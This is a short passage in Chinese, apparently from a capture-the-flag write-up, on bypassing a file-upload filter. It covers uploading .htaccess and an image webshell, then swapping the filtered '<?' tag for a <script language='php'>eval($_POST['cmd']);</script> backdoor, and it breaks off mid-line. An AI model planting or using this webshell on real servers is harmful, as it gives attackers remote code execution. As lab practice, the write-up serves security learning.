打开靶机抓包发现过滤代码发现.htaccess能上传后传入图片马发现内容对<?进行过滤我们换一种方式写后门代码<scriptlanguage="php">eval($_POST['cmd']);</script>写入成功后发现没有回显查资料发现可能使由于php版本过高不支持<scriptlanguage="php">eval($_POST['cm